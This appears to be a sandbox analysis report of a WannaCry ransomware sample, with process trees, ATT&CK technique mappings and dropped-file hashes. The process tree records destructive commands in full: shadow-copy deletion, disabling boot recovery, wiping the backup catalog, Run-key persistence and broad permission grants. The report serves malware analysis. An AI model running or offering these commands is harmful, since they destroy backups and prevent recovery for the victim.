    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.3.1910753217\1322760908" -childID 2 -isForBrowser -prefsHandle 3576 -prefMapHandle 3572 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3c6767c-0937-4f19-a67c-c9e66908780c} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 3588 14baabc2a58 tab
    3⤵
    PID:644
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.4.754300354\1905143269" -childID 3 -isForBrowser -prefsHandle 3604 -prefMapHandle 3268 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f6a6ce6-0639-49b8-96dc-8a6ee2d21db2} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 3924 14babb30258 tab
    3⤵
    PID:2404
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.5.1442828929\29876377" -childID 4 -isForBrowser -prefsHandle 4812 -prefMapHandle 4488 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c510274-ed65-493a-85dc-ca3d6dfa148e} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 4824 14bac682b58 tab
    3⤵
    PID:4996
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.6.1307488610\724575438" -childID 5 -isForBrowser -prefsHandle 4964 -prefMapHandle 4968 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e92dc18-1361-467a-b7bb-2dd3ad95dfa7} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 4956 14bad035858 tab
    3⤵
    PID:2764
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.7.1889428556\905682613" -childID 6 -isForBrowser -prefsHandle 5160 -prefMapHandle 5164 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5df0c7d4-32d0-46ce-9d9b-23a65d4ce8f1} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 5152 14bad032858 tab
    3⤵
    PID:1896
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.8.580235843\1059299835" -childID 7 -isForBrowser -prefsHandle 2648 -prefMapHandle 2644 -prefsLen 26328 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eec5f425-d64c-4c43-9f22-de0cda601af7} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 2660 14bae2dab58 tab
    3⤵
    PID:3528
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.9.470533679\633976505" -childID 8 -isForBrowser -prefsHandle 4884 -prefMapHandle 4468 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1ca88035-a5c5-494f-9bc4-9260af854c58} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 4872 14b9b26a558 tab
    3⤵
    PID:4428
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.10.1871038213\1190940077" -childID 9 -isForBrowser -prefsHandle 4600 -prefMapHandle 3944 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {374f9e5a-7806-4f1e-b94d-f8503db05a8a} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 4816 14b9b22d558 tab
    3⤵
    PID:2604
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.11.221279094\153739102" -childID 10 -isForBrowser -prefsHandle 6320 -prefMapHandle 6280 -prefsLen 26808 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {787e0501-1a3d-4753-870f-18343e84baee} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 6328 14baccd2558 tab
    3⤵
    PID:400
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.12.1332645582\1475824575" -childID 11 -isForBrowser -prefsHandle 5388 -prefMapHandle 6220 -prefsLen 26808 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {136114bf-28d2-49fc-bff6-0572fdde6c24} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 6292 14baecc1058 tab
    3⤵
    PID:4104

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3820

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.csproj.FileListAbsolute.txt
1⤵
PID:2548

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:2184
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:2828
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.0.820577293\2066161052" -parentBuildID 20221007134813 -prefsHandle 1612 -prefMapHandle 1600 -prefsLen 21145 -prefMapSize 233583 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8e31b9e-88cd-4cbb-89ca-5265a21f1fe3} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 1704 20920cfa758 gpu
    3⤵
    PID:4568
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.1.393268130\312030324" -parentBuildID 20221007134813 -prefsHandle 1980 -prefMapHandle 1976 -prefsLen 21190 -prefMapSize 233583 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3fbd7c12-8d71-43df-8433-2db82c44e0b6} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 2004 2090ebe6458 socket
    3⤵
    - Checks processor information in registry
    PID:644
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.2.586240356\1866142644" -childID 1 -isForBrowser -prefsHandle 2712 -prefMapHandle 2708 -prefsLen 21651 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a4c3270-0384-4024-a211-fcfe7ce8d17d} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 2724 20924847958 tab
    3⤵
    PID:3292
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.3.1393738457\1864504748" -childID 2 -isForBrowser -prefsHandle 3276 -prefMapHandle 2732 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3eb94f36-7a1e-4811-81e3-723e2dec2a85} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 3288 209259e9358 tab
    3⤵
    PID:3776
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.4.243577776\1733291937" -childID 3 -isForBrowser -prefsHandle 4008 -prefMapHandle 4012 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a65a7575-5a9d-458b-8191-9ec1f07edd91} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 3984 20926bbdb58 tab
    3⤵
    PID:2904
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.5.1286275282\66111482" -childID 4 -isForBrowser -prefsHandle 4548 -prefMapHandle 4544 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {acdfb0a5-814c-443e-b80d-fdca19bc23a2} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 4572 2092795b758 tab
    3⤵
    PID:4332
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.6.217863551\953537729" -childID 5 -isForBrowser -prefsHandle 4712 -prefMapHandle 4716 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eecc973b-01b7-4e54-8c6b-f11cd18198ce} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 4704 2092795c358 tab
    3⤵
    PID:1820
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.7.695365373\1592387224" -childID 6 -isForBrowser -prefsHandle 4904 -prefMapHandle 4908 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7451cbf-e91b-4112-8eee-e9e36558cd1a} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 4896 2092795cc58 tab
    3⤵
    PID:2620
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2828.8.650729503\1253576218" -childID 7 -isForBrowser -prefsHandle 3812 -prefMapHandle 4232 -prefsLen 26829 -prefMapSize 233583 -jsInitHandle 1308 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48aa7dc7-de7e-43b3-900a-e11449a13639} 2828 "\\.\pipe\gecko-crash-server-pipe.2828" 4176 209281c8558 tab
    3⤵
    PID:676

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
1⤵
- Drops startup file
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:1292
- C:\Windows\SysWOW64\attrib.exe
  attrib +h .
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:396
- C:\Windows\SysWOW64\icacls.exe
  icacls . /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  - System Location Discovery: System Language Discovery
  PID:4740
- C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 257181729107569.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3932
- - C:\Windows\SysWOW64\cscript.exe
    cscript.exe //nologo m.vbs
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1940
- C:\Windows\SysWOW64\attrib.exe
  attrib +h +s F:\$RECYCLE
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:4420
- C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
  @[email protected] co
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4120
- - C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\TaskData\Tor\taskhsvc.exe
    TaskData\Tor\taskhsvc.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5096
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /b @[email protected] vs
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1716
- - C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
    @[email protected] vs
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5088
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      4⤵
      System Location Discovery: System Language Discovery
      PID:4488
    - - C:\Windows\SysWOW64\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        5⤵
        System Location Discovery: System Language Discovery
        Interacts with shadow copies
        
        PID:4208
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2916
- C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4324
- C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:644
- C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:3792
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "kxmrwtygyk434" /t REG_SZ /d "\"C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\tasksche.exe\"" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4648
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "kxmrwtygyk434" /t REG_SZ /d "\"C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\tasksche.exe\"" /f
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:1616
- C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:884
- C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:756
- C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3580
- C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2008
- C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3408
- C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:1716
- C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskse.exe
  taskse.exe C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2788
- C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3372
- C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:1712

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5108

C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe
"C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1972

C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe
"C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1360

C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe
"C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2248

C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe
"C:\Users\Admin\Downloads\You-Are-An-Idiot-main\You-Are-An-Idiot-main\YouAreAnIdiot\obj\Release\YouAreAnIdiot.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2908

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]
"C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2884

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3af4855 /state1:0x41c64e6d
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:644

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Direct Volume Access

T1006

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
64KB

MD5
0e807656bd86f2aef7ccf207f963973b

SHA1
27052af8d103d134369e356b793eb88ba873df55

SHA256
c509c498682bec50142782a51785655020bea27652f46e104e07a530c2ff5162

SHA512
e6c7d5e001e8322ccb1abd101d47e7f1401597518f45dd8da1d757728147262bcb3b1f96128f291e0e367c5b34026b401468e4219b27cf3c37a8d434180cd8f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

Filesize
9KB

MD5
7050d5ae8acfbe560fa11073fef8185d

SHA1
5bc38e77ff06785fe0aec5a345c4ccd15752560e

SHA256
cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

SHA512
a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\0A7E7594E69C439CD52608F096A141AF3C4BD6DD

Filesize
16KB

MD5
9dc4c2d8c8450a1a3d92662fc6e33cb2

SHA1
4ac2db90468cd70ac0b2d050880414f80d411928

SHA256
d337e32d5d22072bfe38ad7cccb5b9b6dda88fd81e582f1a29563d834eb2eca9

SHA512
94d039f1b63a43ddceefd350c6cc907f2b05148fc899fe2ff236a1ecc1fa99818afb3f9904e2053c8352603d19bac74ccfbf23a396d45e6488061ed8f45200b1

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\1BAACC87E20392184398D4457610FD10EA048180

Filesize
14KB

MD5
b17431df1edbffa5ad0e4feb83f5278e

SHA1
00d11f00951b8c3d2a78022385cd4a63846b5c87

SHA256
421aa1f3cc6936bebd33549c6bfe1538684b295af21712f817cffd391b7b516f

SHA512
7c6993c063d0c0c4e771cc67e6d89cb7efb60599c242c5cb6c75970247d6205b92e2e9e50bc7639a8aec5362d93a18105939f298b45b016d4a7c62fa0362a979

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\1BD049D77EA7AE92A7679A43976B47361EFA250A

Filesize
24KB

MD5
a3f8f3fbb9d61587580cfeb7e3e8239b

SHA1
2f22ea4cdd1ef6447d369dfc2fc617c6e81b3db9

SHA256
7fbbd11a28683297199486e7d9061ae7243fe0b6e303080063ba71d99984dae3

SHA512
f41312d8875f2bffc8749f93475b9b8c6ab5f9a9871020dedf6e791a57105105cee3b4b569e475d829d061afcfa3721b8141da388e4855abecee75490e23581c

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\1DF431202663B96214352B1DFE36A726B4137A2F

Filesize
47KB

MD5
4368bede1e1315176fb73f06ce82569a

SHA1
585d07c1aa1c7d22fbec3bef5dbe6b7cc83bc6bb

SHA256
9394bde1f39748f599944b345d9c1eecd57fe32c7cd2d63cfeb29d347cce37d6

SHA512
01ca4518e19961054feefed56320e6ed808589fec8b0fee7a01f8398ad1861e31d5e268713e0de79db14e874930b93a0628b4ac38569f5dbd0b7dda2e7bf98ea

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\2492994A253B970917AF5CDF605580B1C2DC16A0

Filesize
63KB

MD5
c7c5f38c56bddc0bdd2880c4b7244503

SHA1
ceffb4fd2714e0997bb873d5e67f08a43b65362e

SHA256
6c357ef648f280b14d145f4ca68c1514a9f69117b6678072205ef3260b04df89

SHA512
a3906588720dae3c2696fd7eb1376268c8c541b5c1a3dae2423fa2a3b49babebe8212c9b0cd55aadaba3fc5852504907eaf5bf338b4f6a03ee13dffaea2b3f67

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\25E61D0F193C12CBBBE09A429B66070577263AAA

Filesize
14KB

MD5
6afeb01e15792a831327e79e08599b33

SHA1
9bd8c11fe42223332d7d194f89f4d21d6237e5bb

SHA256
3f23a1e8d39cd4a6e55e850df0393e86fd053e2a0a6340525402fcfdcd3df029

SHA512
c705994a8f37504c35392231fc44d0275b299e369dc631c0fcdae3500877d6f21a77b27d73ecae5213ae85df2e1759fa791c60d74789f9c9ec8bd53cc1506f2c

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\28057EBB0875A1D95314E5D3D15B243F03E4AAD3

Filesize
131KB

MD5
2c34728c8f15bff910d9db5d94c2c08f

SHA1
57cdc6cc6eb66a500da1e3d0c91f44707e19afc3

SHA256
5f3ecb707f267453848d6bff98a4a92c55f713e9bcc11d846685d3e162ed66c0

SHA512
0f967737efb34d6c80c22970a6ee5acad4820866ccc6b8dde7e0844fef0e46e6fa787acb4fa4df382062048a6184c577ffdfe0a6a13ea1e7dfd763f0bd1c7f5c

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\2CFCC364A7B2E7A8E9AB96BD93785B6E9759AA7A

Filesize
18KB

MD5
5f2f72dc28bad6bff0c3482fdb34d853

SHA1
fb045e011b5815bebc4690837f0edac6d824b6fd

SHA256
56e629b18620ce7ddc8bd761244e930b45e99f3d47b1f2f69848daccf62013c8

SHA512
3f5d3f4b469c5a311bf35d58a80d8f392b78edd670f318a807cefc77d3355043a28c1df29fcbde7b21c1ee2f03d4386635f96fedf597c6e8d2328ef2937e9042

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\3281DD4C79ACB61B312FD94931181EE61FD498DC

Filesize
53KB

MD5
7cc7c0d965fbe9b353573fa87128437b

SHA1
7b24f38e98bfacc61c6e37a5771428fd18b86ac8

SHA256
bdf03ba42ebd18fe8ba4623ece678edb00041be29df1b0cbf764fc465d3c3478

SHA512
f8d7c31de3ef8cc5605d1d0538beb2967d784c2e1c92eb2ce96c57e7619f20866f1778e87e595e9e260aa7d247b1aa67fb1d81dfe341108f26f4d81b570e6ea5

Download Submit
